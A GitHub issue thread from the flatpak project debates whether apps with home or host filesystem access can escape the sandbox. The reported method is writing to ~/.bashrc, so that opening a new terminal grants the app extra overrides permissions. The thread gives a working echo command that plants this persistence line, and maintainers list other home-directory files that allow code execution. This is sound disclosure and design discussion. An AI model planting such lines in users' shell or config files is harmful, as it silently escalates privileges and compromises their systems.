### ISSUE TITLE
'~/.local/share/flatpak/overrides' bypass from shell configuration files upon launch from terminal when using 'filesystem={home,host}'

### ISSUE THREAD

**Issue by TheEvilSkeleton** [flatpak/flatpak#4151]
## TL;DR

If an application has read-write access to home or host (`filesystem={home,host}`), the application can write malicious commands inside shell configuration files (bashrc, zshrc, etc.), and can also run a simple `echo` command to overwrite its permissions in `~/.local/share/flatpak/overrides/$APP_ID`, a blacklisted directory, which takes effect once the user launches a new terminal without the user knowing.

---

## Description of the problem

I've stumbled upon [flatkill.org](https://flatkill.org/2020/). It was a very interesting article, but they had one very good point:

> Almost all popular apps on Flathub still come with `filesystem=host` or `filesystem=home` permissions, in other words, write access to the user home directory (and more) so all it takes to escape the sandbox is trivial `echo download_and_execute_evil >> ~/.bashrc`. That's it.

While their claim about "Almost all popular apps on Flathub still come with `filesystem=host` or `filesystem=home` permissions" is false (I've verified it), what's after it *is* a big concern in my opinion.

Applications can be written in such a way that not only it can write into shell configuration files if they have read-write permission in either host or home (`filesystem={host,home}`), which the user can then accidentally and unknowingly execute the commands by simply launching a terminal. It can elevate its sandbox permissions by running `echo -e 'echo extra_permissions >> ~/.local/share/flatpak/overrides/$APP_ID' >> ~/.bashrc`.

## Steps to reproduce

I'll take LibreOffice (`org.libreoffice.LibreOffice`) for example, which comes with `filesystem=host`, but it can be done with `filesystem=home` as well. Let's assume it contains malicious code and writes inside your bashrc.

0. Running the `cat` command to show that the `org.libreoffice.LibreOffice` overrides file is empty/nonexistent, followed by a `cat` on the `~/.bashrc` to show that it contains nothing malicious at the moment:
```bash
[TheEvilSkeleton@TheMainLaptop ~]$ cat ~/.local/share/flatpak/overrides/org.libreoffice.LibreOffice
cat: /home/TheEvilSkeleton/.local/share/flatpak/overrides/org.libreoffice.LibreOffice: No such file or directory

[TheEvilSkeleton@TheMainLaptop ~]$ cat ~/.bashrc 
# .bashrc

# Source global definitions
if [ -f /etc/bashrc ]; then
	. /etc/bashrc
fi

# User specific environment
if ! [[ "$PATH" =~ "$HOME/.local/bin:$HOME/bin:" ]]
then
    PATH="$HOME/.local/bin:$HOME/bin:$PATH"
fi
export PATH

# Uncomment the following line if you don't like systemctl's auto-paging feature:
# export SYSTEMD_PAGER=

# User specific aliases and functions
```

Starting the shell in LibreOffice's container for the demonstration:
```bash
[TheEvilSkeleton@TheMainLaptop ~]$ flatpak run --command=bash org.libreoffice.LibreOffice
[📦 org.libreoffice.LibreOffice ~]$ 
```

1. Running `echo` to write in the `~/.bashrc` so it can give itself unwanted permissions when the user starts a new terminal:
```bash
[📦 org.libreoffice.LibreOffice ~]$ echo 'echo -e "[Context]\nsockets=cups;ssh-auth\ndevices=all\n\n[Session Bus Policy]\norg.freedesktop.*=own\norg.gnome.*=own" > ~/.local/share/flatpak/overrides/org.libreoffice.LibreOffice' >> ~/.bashrc 
```

1.1. Running `cat` in the `~/.bashrc` file:
```bash
[TheEvilSkeleton@TheMainLaptop ~]$ cat ~/.bashrc
# .bashrc

# Source global definitions
if [ -f /etc/bashrc ]; then
	. /etc/bashrc
fi

# User specific environment
if ! [[ "$PATH" =~ "$HOME/.local/bin:$HOME/bin:" ]]
then
    PATH="$HOME/.local/bin:$HOME/bin:$PATH"
fi
export PATH

# Uncomment the following line if you don't like systemctl's auto-paging feature:
# export SYSTEMD_PAGER=

# User specific aliases and functions
echo -e "[Context]\nsockets=cups;ssh-auth\ndevices=all\n\n[Session Bus Policy]\norg.freedesktop.*=own\norg.gnome.*=own" > ~/.local/share/flatpak/overrides/org.libreoffice.LibreOffice
```

Now it's just a matter of time for the user to launch a new terminal without knowing what has happened.

2. Launching a new terminal and get greeted by the following (you won't notice any difference):
```bash
[TheEvilSkeleton@TheMainLaptop ~]$ 
```

---

Now, if we run the `cat` command on the overrides file once again:
```bash
[TheEvilSkeleton@TheMainLaptop ~]$ cat ~/.local/share/flatpak/overrides/org.libreoffice.LibreOffice
[Context]
sockets=cups;ssh-auth
devices=all

[Session Bus Policy]
org.freedesktop.*=own
org.gnome.*=own
```

We can see that this is practically a bypass to the overrides directory, since it's a blacklisted directory.

This can be done with any shell configurations files, including `.bashrc` and `.zshrc`.

## Conclusion

Many users use a shell, whether it's bash, zsh, fish, etc. Permitting a Flatpak package `filesystem={home,host}` will be an easy sandbox escape and bypass to the contents inside `~/.local/share/flatpak/overrides`, since all shell configuration files are open and editable by any Flatpak package with such permission. I would  *highly* suggest to blacklist the following files and directories:

**bash**:
- `~/.bashrc`
- `~/.bash_profile`
-  `~/.bash_logout `

Source: https://wiki.archlinux.org/index.php/Bash#Configuration_files

**zsh**:
- `~/.zshenv`
- `~/.zprofile`
- `~.zlogin`
- `~/.zshrc`
- `~/.zlogout`

Source: https://unix.stackexchange.com/a/487889

**fish**:
- `~/.config/fish/` (whole directory)

**dash**:
- `~/.profile` (?)

Source: https://askubuntu.com/a/86143

**X**:
- `~/.xsession`
- `~/.Xresources`
- `~/.xinitrc`

Sources: https://wiki.archlinux.org/index.php/X_resources, https://wiki.archlinux.org/index.php/Xprofile

**Comment by smcv** [comment]
> If an application has read-write access to home or host (filesystem={home,host}), the application can write malicious commands inside shell configuration files (bashrc, zshrc, etc.)

Yes. I don't think this is a security vulnerability: if an application is given permissions that allow arbitrary code execution, then it has arbitrary code execution, which is "game over" as far as sandboxing is concerned.

Flatpak does two things:

* giving apps a predictable runtime environment across distros
* sandboxing

If an app cannot have meaningful sandboxing, because it cannot work as intended without arbitrary code execution on the host system, then it can still be useful to distribute it as a Flatpak app to take advantage of the predictable runtime environment. For example, [the Flatpak version of GNOME Builder](https://github.com/flathub/org.gnome.Builder) has extremely broad permissions and can execute arbitrary code on the host system by just asking nicely. If it didn't have this, it wouldn't be a useful development tool.

As you've noticed, there are a very large number of files in the home directory that give arbitrary code execution, so I don't think it's feasible to make `--filesystem=home` safe to use: the only two options are for Flatpak to have this feature, or to not have it. If it didn't have the feature, then this particular sandbox escape would be prevented for all apps, but apps that genuinely need it in order to work as intended (like GNOME Builder) would not be possible to package using Flatpak.

`--filesystem=host` is a superset of `--filesystem=home`, so it has the same security properties. In recent versions of Flatpak you can use `--filesystem=host-os` and/or `--filesystem=host-etc` if you only need access to things like `/run/host/usr`.

There are lots of other permissions that are less broad than `--filesystem=home` but still provide arbitrary code execution, such as `--filesystem=~/.bashrc`, `--talk-name=org.freedesktop.systemd1`, `--talk-name=org.freedesktop.Flatpak` and `--socket=session-bus`. As with `--filesystem=home`, if Flatpak did not make these possible, then it would be unsuitable for apps like GNOME Builder that cannot work as intended if they are meaningfully sandboxed.

Whoever is choosing or reviewing the permissions is responsible for avoiding "powerful" permissions when meaningful sandboxing is required.

**Comment by TheEvilSkeleton** [comment]
> As with --filesystem=home, if Flatpak did not make these possible, then it would be unsuitable for apps like GNOME Builder that cannot work as intended if they are meaningfully sandboxed.

Fair enough, and I completely agree with you.

---

I am convinced that this is not a security vulnerability anymore. Perhaps, just to be safe, we can make it in a way that the shell configuration files have their own permission "name" or require explicit permission?

I know [Flatseal explicitly whitelists `overrides` directory](https://github.com/flathub/com.github.tchx84.Flatseal/blob/master/com.github.tchx84.Flatseal.json#L15), and that looks a good solution.

**Comment by smcv** [comment]
> Perhaps, just to be safe, we can make it in a way that the shell configuration files have their own permission "name" or require explicit permission?

Honestly, I think that's a bad idea: it would just give you a false sense of security. A deny list ("enumerating badness") is almost never effective. Look at the number of configuration files you included in your list, then think about how likely it is that your list is incomplete.

Here are  a few that you missed: `~/.local/share/applications` (insert malicious code in `Exec=`); `~/.ssh`; `~/.config/systemd` (for `systemd --user` users); `~/bin` or `~/.local/bin` (in the common configuration where those are in the user's `PATH`); `~/.muttrc` (for Mutt users); `~/.forward` (for people with local SMTP); ...

If you want effective sandboxing, then you need to start from "everything not explicitly allowed is forbidden".

> I know Flatseal explicitly whitelists overrides directory, and that looks a good solution

Flatseal can achieve arbitrary code execution on the host system. If you think about it, to be able to do its job, it has to have this. If it can make arbitrary changes to other apps' permissions, then several of the permissions it can give out or take away are arbitrary code execution. It can give those permissions to itself directly, or if that was somehow prevented, it could give those permissions to some other app that is conspiring with it.

**Comment by TheEvilSkeleton** [comment]
> Here are a few that you missed: ~/.local/share/applications (insert malicious code in Exec=); ~/.ssh; ~/.config/systemd (for systemd --user users); ~/bin or ~/.local/bin (in the common configuration where those are in the user's PATH); ~/.muttrc (for Mutt users); ~/.forward (for people with local SMTP); ...

That's a fair point. It also makes it really hard to maintain and keep track of each file. And XDG FileChooser Portal is being used by more and more applications, which that makes it a very good replacement to my suggestion.

I've changed my mind completely. I'm going to close this issue since it has been debunked.
